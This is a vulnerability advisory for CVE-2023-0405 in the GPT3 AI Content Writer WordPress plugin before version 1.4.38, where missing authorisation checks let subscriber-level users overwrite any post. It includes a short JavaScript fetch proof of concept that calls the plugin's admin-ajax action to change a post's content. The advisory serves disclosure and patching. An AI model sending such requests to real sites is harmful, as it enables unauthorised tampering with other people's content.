GPT3 AI Content Writer < 1.4.38 – Subscriber+ Arbitrary Post Content Update | CVE 2023-0405 | Plugin Vulnerabilities

Description

The plugin does not perform any kind of nonce or privilege checks before letting logged-in users modify arbitrary posts.

Proof of Concept

fetch('http://localhost/wp-admin/admin-ajax.php', {
        method: 'POST',
        headers: new Headers({
            'Content-Type': 'application/x-www-form-urlencoded',
        }),
        body: 'action=wpaicg_set_post_content_&post_id=1&content=CHANGED',
        redirect: 'follow'
    }).then(response => response.text()).then(result => console.log(result)).catch(error => console.log('error', error));

Affects Plugins

gpt3-ai-content-generator

Fixed in 1.4.38

References

CVE

Classification

Type

NO AUTHORISATION

OWASP top 10

A5: Broken Access Control

CWE

CVSS

Miscellaneous

Original Researcher

Lana Codes

Submitter

Lana Codes

Submitter website

https://lana.codes/

Submitter twitter

Verified

Yes

WPVDB ID

3ca9ac21-2bce-4480-9079-b4045b261273

Timeline

Publicly Published

2023-01-19 (about 1 years ago)

Added

2023-01-19 (about 1 years ago)

Last Updated

2023-01-19 (about 1 years ago)

Other

Published

Title

Published

2024-04-05

Title

Bricksforge < 2.1.1 - Missing Authorization to Unauthenticated WordPress Settings Update

Published

2023-11-13

Title

WP Custom Admin Interface < 7.32 - Missing Authorization via wpcai_pro_notice_disable

Published

2024-03-12

Title

Bulgarisation for WooCommerce < 3.0.15 - Missing Authorization

Published

2024-04-12

Title

WPZOOM Social Feed Widget & Block < 2.1.14 - Missing Authorization to Authenticated (Subscriber+) Instagram Image Deletion

Published

2023-10-31

Title

Finale Lite < 2.17.0 - Unauthenticated Arbitrary File Deletion